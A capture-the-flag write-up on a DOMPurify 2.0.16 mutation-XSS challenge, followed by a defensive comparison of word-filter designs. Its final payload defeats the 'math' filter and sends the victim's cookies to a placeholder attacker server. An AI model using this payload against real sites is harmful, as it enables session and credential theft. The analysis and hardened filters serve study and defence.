Vulnerable to mXSS, and it tries to filter the word **math**. The vulnerable code:

```javascript
function secureQuery(string) {
  // let's do this real quick, friends are waiting me at the Drunken Bathrobe
  const reg = /math/gi; // nobody likes math
  let res = string.replaceAll(reg, "");
  res = DOMPurify.sanitize(res);
  return res;
}
```

The word filter runs first, and only then does the result go through DOMPurify. Inside the Dockerfile:

```bash
RUN npm i ejs @fastify/view @fastify/formbody @fastify/static dompurify@2.0.16 jsdom
```

DOMPurify 2.0.16 is vulnerable; the fix is the change from v2.0.16 to v2.0.17: https://github.com/cure53/DOMPurify/compare/2.0.16...2.0.17#diff-f44bc3a1bfaa31000b8f4f1359dba82a

From that diff:

```json
"title": "Tests against nesting-based mXSS behavior 2/2",
"payload": "<math><mtext><table><mglyph><style><math>CLICKME</math>",
```

mXSS reading, specifically on DOMPurify:

- https://portswigger.net/daily-swig/dompurify-mutation-xss-bypass-achieved-through-mathml-namespace-confusion
- https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass/

Tools to test:

- https://livedom.lab.xss.academy/

Code for the backend check (the bot that visits the reported URL with the flag cookie set):

```javascript
const puppeteer = require("puppeteer");
// browser_options is defined elsewhere in the challenge source

const cookies = [
  {
    name: "flag",
    value: process.env.FLAG,
  },
];

async function checkReport(query) {
  const browser = await puppeteer.launch(browser_options);
  try {
    const page = await browser.newPage();
    const urlToVisit = "http://127.0.0.1:1337/search?query=" + query;
    console.log("URL to visit:", urlToVisit);
    await page.goto("http://127.0.0.1:1337/");
    await page.setCookie(...cookies);
    await page.goto(urlToVisit, {
      waitUntil: "networkidle0",
      timeout: 10000,
    });
    await browser.close();
  } catch {
    await browser.close();
  }
}
```

Final payload. It evades the **math** filter (stripping `MATH` out of `maMATHth` leaves `math`) and sends the cookie with the flag to our server:

```payload-final
<maMATHth><mtext><table><mglyph><style><maMATHth><img src=x onerror=document.location='http://YOUR-SERVER/?c='%2bdocument.cookie;></mMATHath>
```

![[Pasted image 20221211011536.png]]

Flag:

```flag
hctf{my_n3w_flag-fl4vor3d_c0ck7ail}
```

---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]

Tags: #ctf #hackappatoi2022 #xss #mxss #dompurify #web

Related:
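The root cause on the filter side, as an added example that is not from the writeup or the challenge source: a single-pass strip rewrites the input and then trusts the result, so removing `MATH` from `maMATHth` hands the sanitizer exactly the `math` token it meant to block. The block shows the original behaviour, two hardened variants (strip to a fixed point, or reject without rewriting) and an audit helper; `SAMPLES` are constructed inputs.

```javascript
// Added example (not the challenge's code): the single-pass strip from
// secureQuery versus two variants that cannot reassemble the blocked word.
const BLOCKED = /math/gi;     // same pattern as the challenge's secureQuery
const BLOCKED_TEST = /math/i; // non-global copy: /g regexes keep lastIndex state in .test()

// Single pass, as in the challenge (minus the DOMPurify call that followed it).
function stripOnce(input) {
  return input.replace(BLOCKED, "");
}

// Hardened variant 1: strip until nothing changes, so a removal can never
// leave the blocked token behind, assembled from the surrounding characters.
function stripToFixedPoint(input) {
  let prev;
  let cur = input;
  do {
    prev = cur;
    cur = prev.replace(BLOCKED, "");
  } while (cur !== prev);
  return cur;
}

// Hardened variant 2: reject instead of rewrite. A check that never modifies
// the input cannot manufacture new tokens for the sanitizer downstream.
function rejectIfBlocked(input) {
  if (BLOCKED_TEST.test(input)) {
    throw new Error("blocked token in input");
  }
  return input;
}

// Audit helper: run a filter over samples and return those whose output still
// contains the blocked token, i.e. the cases where the filter defeated itself.
function auditFilter(filter, samples) {
  return samples.filter((s) => BLOCKED_TEST.test(filter(s)));
}

// Constructed samples: the writeup's nesting trick plus benign input.
const SAMPLES = [
  "<maMATHth><mtext><table><mglyph><style><maMATHth>x</mMATHath>",
  "<math><mtext>plain</mtext></math>",
  "hello world",
];

console.log("single pass still leaks:", auditFilter(stripOnce, SAMPLES));
console.log("fixed point leaks:", auditFilter(stripToFixedPoint, SAMPLES));
```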